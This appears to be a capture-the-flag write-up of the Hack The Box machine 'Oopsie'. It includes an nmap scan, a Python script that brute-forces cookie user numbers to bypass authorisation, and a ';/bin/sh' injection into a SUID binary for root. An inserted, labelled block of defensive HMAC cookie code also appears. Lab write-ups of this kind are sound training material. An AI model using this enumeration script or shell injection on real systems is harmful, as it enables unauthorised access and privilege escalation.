Saturday 28 August 2021

[HTB] Oopsie

The scan showed 2 open ports: 22 and 80.

$ sudo nmap -PS -sS 10.10.10.28 -sC

Nmap scan report for 10.10.10.28
Host is up (0.68s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http
|_http-title: Welcome


There was no login page or any other feature on the site.


Viewing the page source revealed another directory.


I found 2 important pieces of information.
1. /cdn-cgi/login/login.php
2. /uploads/

I noted the 2nd directory; it will be useful later.

I could see a login page.

The account was admin and the password was "MEGACORP_4dm1n!!". The password was from the previous box.

I could see some menus and my cookie. The cookie was "user=34322; role=admin".

The uploads menu showed an error message "This action require super admin rights".


So I needed to gain super admin rights. I changed the user number in the cookie.

import sys
import requests

def exp():
    host = "http://10.10.10.28"
    # Try each candidate user number while keeping role=admin
    for i in range(86574, 100000):
        cookies = {
            "user": str(i),
            "role": "admin",
        }

        r = requests.get(host + "/cdn-cgi/login/admin.php?content=uploads", cookies=cookies)
        # Stop at the first user number whose response lacks the "Authenticating" text
        if "Authenticating" not in r.text:
            print(f"Found: {i}")
            sys.exit()

if __name__ == "__main__":
    exp()


I found the user number to access the uploads menu.
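
The underlying weakness is that the application authorises on cookie values the client controls. The following is an added example, not code from this post or from the target application: it puts that flawed check beside a hardened one that binds user and role under a server-side HMAC. The function names, the key and the super admin id are all constructed for illustration.

```python
import hashlib
import hmac

SERVER_KEY = b"constructed-demo-key"   # assumption: secret known only to the server
SUPER_ADMIN_ID = "90001"               # constructed id, not the value from the box

def naive_can_upload(cookies):
    """Flawed: trusts the client-supplied user number, so it can be enumerated."""
    return cookies.get("role") == "admin" and cookies.get("user") == SUPER_ADMIN_ID

def _tag(user, role):
    # One tag covers both fields, so neither can be changed independently
    msg = f"{user}|{role}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def issue_cookies(user, role):
    """Set at login: the cookie values plus a tag only the server can compute."""
    return {"user": user, "role": role, "sig": _tag(user, role)}

def verified_identity(cookies):
    """Return (user, role) only if the tag matches, otherwise None."""
    user, role, sig = (cookies.get(k, "") for k in ("user", "role", "sig"))
    expected = _tag(user, role)
    # Constant-time comparison avoids leaking how much of the tag matched
    if not hmac.compare_digest(expected.encode(), sig.encode()):
        return None
    return user, role

def hardened_can_upload(cookies):
    ident = verified_identity(cookies)
    return ident is not None and ident[0] == SUPER_ADMIN_ID

def demo():
    issued = issue_cookies("34322", "admin")      # what an ordinary admin receives
    tampered = dict(issued, user=SUPER_ADMIN_ID)  # user number edited client-side
    legit_super = issue_cookies(SUPER_ADMIN_ID, "super admin")
    return {
        "naive_tampered": naive_can_upload(tampered),
        "hardened_tampered": hardened_can_upload(tampered),
        "hardened_legit_super": hardened_can_upload(legit_super),
        "hardened_legit_admin": hardened_can_upload(issued),
    }

if __name__ == "__main__":
    print(demo())
```

Keeping the user and role in a server-side session store, with only an opaque random session id in the cookie, removes the tamperable fields altogether.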

I generated a webshell using weevely.

There was a user account and password.


I could access the box over SSH with robert's credentials. I got the user flag.

Next, I needed to gain root permission. I looked for other vulnerabilities.

After a few minutes, I checked a suspicious group name "bugtracker".


I found the suspicious binary /usr/bin/bugtracker.
- find / -type f -group bugtracker 2>/dev/null

It runs with root permission.

I got root permission after I entered ";/bin/sh".


END
